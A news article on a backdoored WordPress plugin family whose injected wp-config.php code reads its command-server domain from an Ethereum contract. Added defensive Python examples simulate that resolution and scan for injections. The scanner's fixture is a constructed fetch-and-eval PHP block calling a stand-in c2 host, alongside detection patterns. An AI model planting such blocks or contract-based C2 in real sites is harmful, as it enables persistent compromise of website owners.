Cyberattacks: Thousands of WordPress Sites at Risk After Massive Attack on Popular Plugins

WordPress plugins can expand functionality, but they are also a “double-edged sword.” When malicious code manages to infiltrate a plugin ecosystem with a large user base, the consequences spread rapidly.

Recently, as the Sapo portal reports, a popular plugin brand was turned into a weapon for downloading and spreading malicious software. The supply chain attack was disclosed by Austin Ginder, a programmer and founder of Anchor, who found the threat already active on several of his clients' sites and noticed that it used an unusual method to keep its "command and control" channel alive even if the server were taken down.

Ginder’s investigation began when a client of his company received an alert from the WordPress.org security team. The warning indicated that the Countdown Timer Ultimate (CTU) plugin contained dangerous code, including a backdoor that could be exploited by third parties to gain unauthorized access to any website that had installed it.

This plugin was part of a series developed by Essential Plugin (EP), an India-based brand that was recently acquired by an unknown group operating in the cryptocurrency and online gaming sectors.

The change in ownership that led to this attack

Shortly after acquiring the approximately 30 plugins created by EP, the new owner added the backdoor in its very first code submission. Although the backdoor was inserted eight months ago, the first active malware injection through it was not detected until April 6.

The injected code was a PHP block written into wp-config.php, the core WordPress configuration file, which should contain nothing but database credentials, salts and a handful of constants. The malware's objective was to collect spam links, force URL redirects, and automatically generate fraudulent pages.

The mechanism responsible for checking new instructions from the criminals used an unusual technique: the command server domain was hidden within a smart contract on the Ethereum network.

Because each infected site read the current domain from the contract before contacting the server, the attacker could publish a new domain at any time simply by updating the contract. Taking down the server or blocking the old domain therefore did not cut off the infection; the sites would just fetch the replacement.
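The following example is added here to show why a contract-hosted domain survives a takedown; it is not code from the article or from Ginder's analysis, and the article does not describe how the malware read the contract. It assumes the usual way a client reads a contract value, a read-only eth_call to a view function that returns one ABI-encoded string, and it stands in for the chain with an in-memory contract so it runs offline. The contract address, function selector and domain names are placeholders.

```python
import json


def abi_encode_string(value: str) -> str:
    """ABI-encode a single dynamic `string` return value as a view function would."""
    data = value.encode()
    padded = data + b"\x00" * ((32 - len(data) % 32) % 32)
    head = (32).to_bytes(32, "big")           # offset of the dynamic part (always 0x20 here)
    length = len(data).to_bytes(32, "big")    # byte length of the string
    return "0x" + (head + length + padded).hex()


def abi_decode_string(result: str) -> str:
    """Decode the eth_call result of a view function that returns one `string`."""
    raw = bytes.fromhex(result[2:] if result.startswith("0x") else result)
    offset = int.from_bytes(raw[0:32], "big")
    length = int.from_bytes(raw[offset:offset + 32], "big")
    return raw[offset + 32:offset + 32 + length].decode()


class FakeC2Contract:
    """Offline stand-in for the on-chain contract: one owner-writable string slot."""

    def __init__(self, owner: str, domain: str):
        self.owner = owner
        self.domain = domain

    def set_domain(self, caller: str, domain: str) -> None:
        # Only the key that deployed the contract can rewrite the slot; defenders cannot.
        if caller != self.owner:
            raise PermissionError("only the contract owner may update the domain")
        self.domain = domain

    def eth_call(self) -> str:
        # A real node would return exactly this ABI-encoded blob for a `string` getter.
        return abi_encode_string(self.domain)


def eth_call_body(contract_address: str, selector: str) -> str:
    """JSON-RPC body an infected site would POST to a public Ethereum RPC endpoint.

    Useful as a signature when reviewing outbound requests from a web server that
    has no business talking to a blockchain node.
    """
    return json.dumps({"jsonrpc": "2.0", "id": 1, "method": "eth_call",
                       "params": [{"to": contract_address, "data": selector}, "latest"]})


def resolve_c2(contract: FakeC2Contract) -> str:
    """What the malware would do on each check-in: read the live domain from the chain."""
    return abi_decode_string(contract.eth_call())


def still_reachable(contract: FakeC2Contract, blocked_domains) -> bool:
    """A domain blocklist only helps while the on-chain value is still on the list."""
    return resolve_c2(contract) not in set(blocked_domains)


if __name__ == "__main__":
    # Constructed values: the attacker deploys the contract, defenders block the first domain.
    c = FakeC2Contract(owner="attacker", domain="c2-one.example.invalid")
    blocklist = {"c2-one.example.invalid"}
    print("resolved:", resolve_c2(c), "blocked:", not still_reachable(c, blocklist))
    # One owner transaction later, every infected site resolves the new domain.
    c.set_domain("attacker", "c2-two.example.invalid")
    print("resolved:", resolve_c2(c), "blocked:", not still_reachable(c, blocklist))
    print(eth_call_body("0x" + "00" * 20, "0xdeadbeef"))  # placeholder address and selector
```

The practical consequence for defenders is that blocking domains is a losing race; the durable controls are removing the injected block, egress-filtering the web server so it cannot reach public RPC endpoints at all, and alerting on any eth_call traffic from a host that should never produce it.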

After being notified, the WordPress.org team removed all plugins associated with the EP brand. Ginder has since published a list of the plugins confirmed to contain the malicious code so that administrators can check whether their sites are at risk.
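For administrators who want to check a site, the following scanner is an added example and not a tool from the article or from Ginder. It looks for code that has no place in wp-config.php (as described above, the file the injection targeted) and compares the installed plugin slugs against the published list. The wp-config.php content and the injected block are constructed for the example and do not reproduce the real payload; the flagged slug list holds one hypothetical entry and should be replaced with the published list.

```python
import re
import sys

# Constructed wp-config.php content for this example; it is not the real injected code.
CLEAN_WP_CONFIG = """<?php
define( 'DB_NAME', 'wordpress' );
define( 'DB_USER', 'wp' );
define( 'DB_PASSWORD', 'secret' );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'wp_';
if ( ! defined( 'ABSPATH' ) ) {
    define( 'ABSPATH', __DIR__ . '/' );
}
require_once ABSPATH . 'wp-settings.php';
"""

# A constructed stand-in for an injected block: obfuscated payload plus a remote fetch.
INJECTED_BLOCK = """$_p = 'aGVsbG8=';
@eval(base64_decode($_p));
$_r = @file_get_contents('https://c2.example.invalid/cmd');
"""

# Attackers tend to drop their block just above $table_prefix so it runs before wp-settings.php.
INFECTED_WP_CONFIG = CLEAN_WP_CONFIG.replace("$table_prefix", INJECTED_BLOCK + "$table_prefix", 1)

# Indicators that have no business in a file that should only define constants.
SUSPICIOUS = [
    (r"\beval\s*\(", "eval() call"),
    (r"\b(base64_decode|gzinflate|gzuncompress|str_rot13)\s*\(", "decoder/unpacker call"),
    (r"""\b(file_get_contents|curl_init|fsockopen)\s*\(\s*['"]?https?://""", "remote fetch"),
    (r"""['"][A-Za-z0-9+/=]{60,}['"]""", "long base64-looking literal"),
    (r"""\bpreg_replace\s*\(\s*['"].*/e['"]""", "preg_replace /e"),
]


def scan_wp_config(text):
    """Return (line number, indicator, line) for every suspicious line in a wp-config.php."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for pattern, label in SUSPICIOUS:
            if re.search(pattern, line):
                findings.append((lineno, label, line.strip()))
    return findings


def scan_file(path):
    """Scan a real wp-config.php on disk."""
    with open(path, encoding="utf-8", errors="replace") as fh:
        return scan_wp_config(fh.read())


def flagged_plugins(installed, flagged):
    """Installed plugin slugs that appear on the list of plugins known to carry the backdoor."""
    return sorted(set(installed) & set(flagged))


# Hypothetical slug for illustration only: replace with the published list.
FLAGGED_SLUGS = ["countdown-timer-ultimate"]


if __name__ == "__main__":
    # Usage: python scan.py /var/www/html/wp-config.php  (no argument scans the built-in sample)
    target = sys.argv[1] if len(sys.argv) > 1 else None
    findings = scan_file(target) if target else scan_wp_config(INFECTED_WP_CONFIG)
    for lineno, label, line in findings:
        print(f"line {lineno}: {label}: {line}")
    installed = ["akismet", "countdown-timer-ultimate"]  # constructed, e.g. from ls wp-content/plugins
    print("flagged plugins:", flagged_plugins(installed, FLAGGED_SLUGS))
```

A hit on any indicator is worth a manual look, but a clean scan is not proof of a clean site: the plugin that carried the backdoor stays dangerous until it is removed, whatever wp-config.php looks like today.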
